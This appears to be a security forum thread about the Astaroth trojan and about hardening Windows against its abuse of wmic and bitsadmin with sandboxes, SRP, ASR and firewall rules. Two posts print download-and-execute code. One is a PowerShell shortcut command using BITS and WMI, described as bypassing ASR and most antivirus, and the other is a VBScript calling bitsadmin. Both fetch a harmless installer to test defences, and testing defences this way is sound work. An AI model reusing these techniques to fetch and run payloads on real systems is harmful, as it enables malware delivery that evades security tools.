If wmic.exe and bitsadmin.exe is blocked from executing with a HIPS rule, will there be any problems with launching legitimate applications?
This Trojan exploits antivirus software to steal your data
- Thread starter Solarquest
- Start date
Running the browser sandboxed is a good idea but sandboxie allows the user to recover any files downloaded. If the user is not tech savvy, the user will eventually end up executing the downloaded file.I think the most effective thing would be a sandbox..... Astaroth can't help it.
or if it can?
Comodo or NVT OSA should block this but not sure about when with Comodo. Couple of questions:
-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?
I guess am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:
I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install sandboxie. No experience with the setup, and I think I would get lost...
-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?
I guess am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:
I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install sandboxie. No experience with the setup, and I think I would get lost...
It is sufficient for this malware and some more. But WD ASR can be possibly bypassed on Windows Home and Pro by PowerShell, for example:
Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).Code:powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
The SUMo webpage:
This will be blocked by SRP though. ASR on its own is not sufficient for sure but I wonder if blacklisting sponsors is really required or the native security mechanisms combined are sufficient.
Again, nothing wrong with blacklisting some sponsors whose behavior is clear and do not affect the system but the task of compiling a policy for all sponsors is complex and mistakes may break the system. If eg ASR+SRP (+others?) suffice then it may make sense to stop there.
It cannot infect the system, when the user has run the shortcut in the sandbox. But, it can gather and send information to the remote server (except the sandbox with blocked Internet connection). Furthermore, the malware works invisibly, so the user may think that it cannot run in the sandbox, and may be fooled to run it outside the sandbox.I think the most effective thing would be a sandbox..... Astaroth can't help it.
or if it can?
I am not sure if Comodo Firewall Sandbox can stop injecting the unsafe DLL by the legal Windows or Avast tools.
Those executables are hardly used by the user applications and Windows system. There should not be any problems with blocking them.
Sometimes bitsadmin is needed for windows updates. It has a warning sign in syshardener. I would not want to block it through firewall, I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.
But if you have a good default/deny that starts working quickly after reboot, then the payload will anyways be blocked,. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.
Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
But if you have a good default/deny that starts working quickly after reboot, then the payload will anyways be blocked,. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.
Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
As I said, you can block shortcuts via SRP, but doing this in the proper way, will require a good knowledge of SRP. Most people, allow shortcuts in SRP.
Blocking many sponsors as administrator can be dangerous.
But, SRP can block them as standard user
That's the safe way to do it. And use a Standard user account for daily computer use, to make it even harder for the bad guy to get elevated privileges.
ReHIPS blocks some sponsors even for admin, but allows them for SYSTEM.
1: Comodo Sanbox. no need to use it for everything can be used punctually for mail and suspicious pages.
2: As for Sandboxie, the free version is very easy is just configure delete on exit and ready.
I would take this opportunity to kindly request any of the testers to please test comodo at cruelsister settings vs this malware and upload the video.:notworthy: Sorry I'm asking for too much. :emoji_cold_sweat:
I never ran myself comodo sandbox with cs settings, since it runs browser as rejected without internet connection lol
Sandboxie free is easy to use, doesnt slow anything down. I used it with basilisk browser and was working pretty well. Have you completely gotten rid of qihoo 360 ? I liked qihoo sandbox when i tried it
Is this the case for the Windows Firewall only? Or is this the same for every third party firewall?
No need to block it for admin a user should use SUA for day to day work, shortcut SRP is probably needed (see below for a weaker alternative)
Assuming only administrative tasks happen as admin and no bypass for the native mechanisms it becomes a question whether the below leaves anything open
UAC+ASR+SRP(incl shortcuts)+Powershell constrained mode
I don’t think it does but ofc it needs a thorough analysis of the attack vectors to confirm or reject the statement
A weaken version of this is
UAC+ASR+SRP(without shortcuts)+Powershell constrained & only signed+block only Powershell in Windows Firewall
This does block one lolbin but just a single one, Powershell, for everything else it relies on UAC+ASR+SRP
Maybe the weaker version suffices as well
Edit: weaker version does not suffice as is but perhaps it’s worth checking what is missing (eg would adding DEP suffice?)
Last edited:
F
ForgottenSeer 69673
Windows Updates can use Background Intelligent Transfer Service (BITS) to download updates, but does not use bitsadmin.exe for that. BITS cannot be blocked by Windows Firewall and SRP, but bitsadmin.exe can be blocked by SRP, because the malware runs it with standard user rights. The download initiated by bitsadmin.exe cannot be blocked by Windows Firewall, because it is not bitsadmin.exe that downloads the file, but Background Intelligent Transfer Service.
You can check it by yourself by running the below script and look at ProcessExplorer to see the integrity level of bitsadmin.exe:
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("bitsadmin.exe /transfer 'JobName' https://kcsoftwares.com/files/sumo_lite.exe C:\Users\Admin\Downloads\sumo_lite.exe")
WScript.Sleep(10000)The script can be also used to confirm that the download initiated by bitsadmin.exe, cannot be blocked by the Windows Firewall rule, like @smu26 said.
Post Edited.
I confirmed by myself that the download initiated by bitsadmin.exe cannot be stopped by the firewall rule for bitsadmin.exe . Before, that I was wrongly thought that it can be stopped by the firewall, because it runs with standard user rights. But, in fact, the download is done by something else (Background Intelligent Transfer Service).
Last edited:
Sorry for the dumb question. But can you please explain to me how they will stop the malware? Does syshardener disable wmic/bitsadmin? And does OSA monitor wmic and bitsadmin? H_C at default-deny should stop the execution of the malicious.ink shortcut file, right?
Surprised, I haven't seen Avast make any statement regarding this. Perhaps they will eventually.
You can choose to block both or not, depending on whether a process affects functionality. Here is what i have, othes enable nearly all the options successfully.
You may also like...
-
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection- Started by Brownie2019
- Replies: 12
-
Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets- Started by Parkinsond
- Replies: 0
-
-
Banking Trojans Target Latin America and Europe Through Google Cloud Run- Started by silversurfer
- Replies: 0
